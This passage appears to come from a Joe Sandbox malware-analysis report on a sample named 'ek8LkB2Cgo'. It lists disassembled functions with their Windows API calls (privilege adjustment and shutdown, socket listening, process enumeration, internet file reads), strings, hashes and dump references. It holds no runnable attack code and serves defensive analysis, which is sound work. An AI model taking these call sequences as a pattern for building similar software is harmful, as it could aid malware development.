                                                                                    • Part of subcall function 0052B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0052B1AD
                                                                                    • Part of subcall function 0052B134: GetLastError.KERNEL32 ref: 0052B1BA
                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00537A0F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                  • String ID: $@$SeShutdownPrivilege
                                                                                  • API String ID: 2234035333-194228
                                                                                  • Opcode ID: 78f825994e0289398c27a8c46aebd9c4993bf307a8ac5ad09fd87e48d8bca92f
                                                                                  • Instruction ID: 2cac17394f6a9b15bc3f356a540d9af0e364a5d6c544857bfafb41055d308536
                                                                                  • Opcode Fuzzy Hash: 78f825994e0289398c27a8c46aebd9c4993bf307a8ac5ad09fd87e48d8bca92f
                                                                                  • Instruction Fuzzy Hash: E601F7B1E5822AABF7381664DC8FBBF7F68FB08341F140924F903A20C2E5605E00A1B0
                                                                                  Function 004F9B60 Relevance: 9.8, Strings: 7, Instructions: 1055COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$vv9aqg50vv9aqg50vv9aqg50vv9aqg50vv9aqg56vv9aqg56vv9aqg58vv9aqg59vv9aqg54vv9aqg55vv9aqg5evv9aqg50vv9aqg5bvv9aqg59vv9aqg56vv9aqg55vv$Y
                                                                                  • API String ID: 0-4031888713
                                                                                  • Opcode ID: 24b147b46617ae7aa69ef1485dd0f1bbda64237cf19de69fe9fdf52e8c221eb6
                                                                                  • Instruction ID: 5fe323fd3fb033f6de3ff2e6380821ba1601e43defd325e35e3e1d3e9182a571
                                                                                  • Opcode Fuzzy Hash: 24b147b46617ae7aa69ef1485dd0f1bbda64237cf19de69fe9fdf52e8c221eb6
                                                                                  • Instruction Fuzzy Hash: A5929EB1E0021ACBDF24CF58D8407BEBBB1BB54314F15819AD91AAB380D7789D81DF96
                                                                                  Function 00548C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00548CA8
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00548CB7
                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00548CD3
                                                                                  • listen.WSOCK32(00000000,00000005), ref: 00548CE2
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00548CFC
                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00548D10
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                  • String ID:
                                                                                  • API String ID: 1279440585-0
                                                                                  • Opcode ID: aed5f6c5fd7d70a87709980dd6b33fa0788351de6b89006b1ee4673ef312a51d
                                                                                  • Instruction ID: caaeb10d7a2bb38f715853a447d7bec1df5c429b38fb93e9100e4b03fc3d3ffd
                                                                                  • Opcode Fuzzy Hash: aed5f6c5fd7d70a87709980dd6b33fa0788351de6b89006b1ee4673ef312a51d
                                                                                  • Instruction Fuzzy Hash: AF21E4316002019FCB14EF28DC89B7EBBB9FF48318F104159F916AB2D1CB30AD469B61
                                                                                  Function 00536532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00536554
                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00536564
                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00536583
                                                                                  • __wsplitpath.LIBCMT ref: 005365A7
                                                                                  • _wcscat.LIBCMT ref: 005365BA
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 005365F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                  • String ID:
                                                                                  • API String ID: 1605983538-0
                                                                                  • Opcode ID: c957cd1cf53803ba8da620f8a3862b75b8dcbeaca775f534a72eb6180d4fcd25
                                                                                  • Instruction ID: 239484f4877fb9679905373caa02bfc215d1fdc272d2aa8571f3d43af9d08ed4
                                                                                  • Opcode Fuzzy Hash: c957cd1cf53803ba8da620f8a3862b75b8dcbeaca775f534a72eb6180d4fcd25
                                                                                  • Instruction Fuzzy Hash: 76215371900219EBDB20ABA4DC89BDDBBBCBB58300F9044B9E505E7141DB759FC5DB60
                                                                                  Function 005313CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 005313DC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen
                                                                                  • String ID: ($,2Z$<2Z$|
                                                                                  • API String ID: 1659193697-1582873280
                                                                                  • Opcode ID: 219f9c5c61162028490e0e82b8dad9ec8b1aef0cf0c958e04d62f03d99a6201d
                                                                                  • Instruction ID: 83e3aa0a1691d50f39872b54eb2aebd13fc4bbcca0a4057ab97273868e0cc121
                                                                                  • Opcode Fuzzy Hash: 219f9c5c61162028490e0e82b8dad9ec8b1aef0cf0c958e04d62f03d99a6201d
                                                                                  • Instruction Fuzzy Hash: 90320575A00A059FCB28CF69D490A6ABBF0FF48310F15C56EE59ADB3A1E770E941CB44
                                                                                  Function 0054923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0054A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0054A84E
                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00549296
                                                                                  • WSAGetLastError.WSOCK32(00000000,00000000), ref: 005492B9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastinet_addrsocket
                                                                                  • String ID:
                                                                                  • API String ID: 4170576061-0
                                                                                  • Opcode ID: f1de47a0ea1bc918f9910c10a03a77f81c868bc322efccbd86c2f48945e4401f
                                                                                  • Instruction ID: aba52d59149d015b3c1e3fb4ade35c1ac26682276f4b7c918753607a38a35396
                                                                                  • Opcode Fuzzy Hash: f1de47a0ea1bc918f9910c10a03a77f81c868bc322efccbd86c2f48945e4401f
                                                                                  • Instruction Fuzzy Hash: AC41C170600205AFDB14AF28C84AE7E7BEDFF84728F04454DF956AB2C2CB749D019B95
                                                                                  Function 0053EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0053EB8A
                                                                                  • _wcscmp.LIBCMT ref: 0053EBBA
                                                                                  • _wcscmp.LIBCMT ref: 0053EBCF
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0053EBE0
                                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0053EC0E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                  • String ID:
                                                                                  • API String ID: 2387731787-0
                                                                                  • Opcode ID: 13c40414da1cc9b71838895f41e5a8fd3d1fcf5dfe4e0c1f238c1f9034d286a1
                                                                                  • Instruction ID: 6c3aa6c59827860f91bffdabbaae22d1d86698c1d3f2040098060d14bf3656ba
                                                                                  • Opcode Fuzzy Hash: 13c40414da1cc9b71838895f41e5a8fd3d1fcf5dfe4e0c1f238c1f9034d286a1
                                                                                  • Instruction Fuzzy Hash: BC41DD356042029FDB18DF28C495E9ABBE4FF89324F10455DE95A8B3E1DB31AD84CF91
                                                                                  Function 00558111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                  • String ID:
                                                                                  • API String ID: 292994002-0
                                                                                  • Opcode ID: 5ed26a6e036d14e463c5701669879fd75e7a62d614124f30b78ade5bab51bd74
                                                                                  • Instruction ID: 38a3f8f333432cfa3399218b46c7e68ee08fb1ba754e3acaf18d20fbff513127
                                                                                  • Opcode Fuzzy Hash: 5ed26a6e036d14e463c5701669879fd75e7a62d614124f30b78ade5bab51bd74
                                                                                  • Instruction Fuzzy Hash: 89119031700A156BE7211F26DC58A7E7FA9FF94762F04042AFC49E7281CF70994ADBA4
                                                                                  Function 0050E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,0050E014,771B0AE0,0050DEF1,0058DC38,?,?), ref: 0050E02C
                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0050E03E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                  • API String ID: 2574300362-192647395
                                                                                  • Opcode ID: 633d96295013978f89ae025b9bbd59f4fc5c1f45870db7be2627cfa8658df29f
                                                                                  • Instruction ID: 42f3b8708f2136c3ec47093227be51b7bd695ea20b0a8a59ff2dd76b41fe6a1d
                                                                                  • Opcode Fuzzy Hash: 633d96295013978f89ae025b9bbd59f4fc5c1f45870db7be2627cfa8658df29f
                                                                                  • Instruction Fuzzy Hash: 77D05EB04007129FC7214B64E80E62A7AF8BF11310F28481AA88692190D7B4C8C4DA60
                                                                                  Function 00503B70 Relevance: 5.9, Strings: 4, Instructions: 903COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throwstd::exception::exception
                                                                                  • String ID: @$ [$ [$ [
                                                                                  • API String ID: 3728558374-3600346879
                                                                                  • Opcode ID: 37d0486d8157fcfc7e320d56f3289c4e3b9dcd379b554970f817399a34b53ec2
                                                                                  • Instruction ID: bd81d79a756e2a6630cf8090fda39b95b71f3792692a59e3dcb74029c116d6a4
                                                                                  • Opcode Fuzzy Hash: 37d0486d8157fcfc7e320d56f3289c4e3b9dcd379b554970f817399a34b53ec2
                                                                                  • Instruction Fuzzy Hash: 9572CE74E0420A9FCF10EF94C495ABEBFB9FF88304F14845AE915AB291D734AE45CB91
                                                                                  Function 0050B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0050B34E: GetWindowLongW.USER32(?,000000EB), ref: 0050B35F
                                                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 0050B22F
                                                                                    • Part of subcall function 0050B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0050B5A5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Proc$LongWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2749884682-0
                                                                                  • Opcode ID: 4178e53f0fcd8bf1c401124a329c38ca4f3563c0cca9f7627f52457a65699a56
                                                                                  • Instruction ID: 9b5f4fb772767be31f81aae77301b99a61d6d655ce913d481cf814fbbd629f80
                                                                                  • Opcode Fuzzy Hash: 4178e53f0fcd8bf1c401124a329c38ca4f3563c0cca9f7627f52457a65699a56
                                                                                  • Instruction Fuzzy Hash: CFA14578115107BAFA386F295CDEEBF2E6CFB92741B500A1AF802D71D1DB14AC01E272
                                                                                  Function 00544EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,005443BF,00000000), ref: 00544FA6
                                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00544FD2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                                  • String ID:
                                                                                  • API String ID: 599397726-0
                                                                                  • Opcode ID: b3aa2b5f9d6b1e2def2f1b3568ce20c841603c10da0d4f618c9a76cbd641f0ac
                                                                                  • Instruction ID: 9dc3ef5b53336b6729b0f878c39feddeac61fe7ad1329322fd4de212e774e0d5
                                                                                  • Opcode Fuzzy Hash: b3aa2b5f9d6b1e2def2f1b3568ce20c841603c10da0d4f618c9a76cbd641f0ac
                                                                                  • Instruction Fuzzy Hash: 3E41E975544609BFEB20DE84DC89FFF7BBCFB8071CF10402AF60566181EA719E459A60
                                                                                  Function 004F77B0 Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1076COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID: \QZ
                                                                                  • API String ID: 4104443479-3002718777
                                                                                  • Opcode ID: 306a571eff5f6ad43e246cc8b45a437dfcdb3adb4ead19d54014a2d4e285a388
                                                                                  • Instruction ID: e06d6701b2a09fed4e89b285de2740b13ff70bc4396aaf1e454e850436a2a8ff
                                                                                  • Opcode Fuzzy Hash: 306a571eff5f6ad43e246cc8b45a437dfcdb3adb4ead19d54014a2d4e285a388
                                                                                  • Instruction Fuzzy Hash: 48A25D70D04219CFDB24CF58C8806ADBBB1FF48314F2581AAD959AB391D7389E82DF55
                                                                                  Function 0053E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0053E20D
                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0053E267
                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0053E2B4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                  • String ID:
                                                                                  • API String ID: 1682464887-0
                                                                                  • Opcode ID: 0d9d190be9c1feccb7da15813a898d434a9230d27d0202c9d481a49495ed2661
                                                                                  • Instruction ID: 61cde40799cb87f5c49b5924dfcc42aab645691dd52b5dc45c04753ac710a200
                                                                                  • Opcode Fuzzy Hash: 0d9d190be9c1feccb7da15813a898d434a9230d27d0202c9d481a49495ed2661
                                                                                  • Instruction Fuzzy Hash: EF216035A00118EFCB00DFA5D885EAEBBF8FF98314F0484A9E905A7251DB319955DB50
                                                                                  Function 0052B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0050F4EA: std::exception::exception.LIBCMT ref: 0050F51E
                                                                                    • Part of subcall function 0050F4EA: __CxxThrowException@8.LIBCMT ref: 0050F533
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0052B180
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0052B1AD
                                                                                  • GetLastError.KERNEL32 ref: 0052B1BA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                  • String ID:
                                                                                  • API String ID: 1922334811-0
                                                                                  • Opcode ID: 81d34a47c2c895918fad2d0e5da57514d3fd456cfb2352485f79a74554d52f59
                                                                                  • Instruction ID: 1c4afffcec430dafd7f49b9318418404ea74ce4b25d13ac04a2bca1bbc62815e
                                                                                  • Opcode Fuzzy Hash: 81d34a47c2c895918fad2d0e5da57514d3fd456cfb2352485f79a74554d52f59
                                                                                  • Instruction Fuzzy Hash: 4C119DB1400205AFE7289F54EC89D2ABBB8FF45710B20852EE45A97280EB70FC41CB60
                                                                                  Function 00536606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00536623
                                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00536664
                                                                                  • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0053666F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
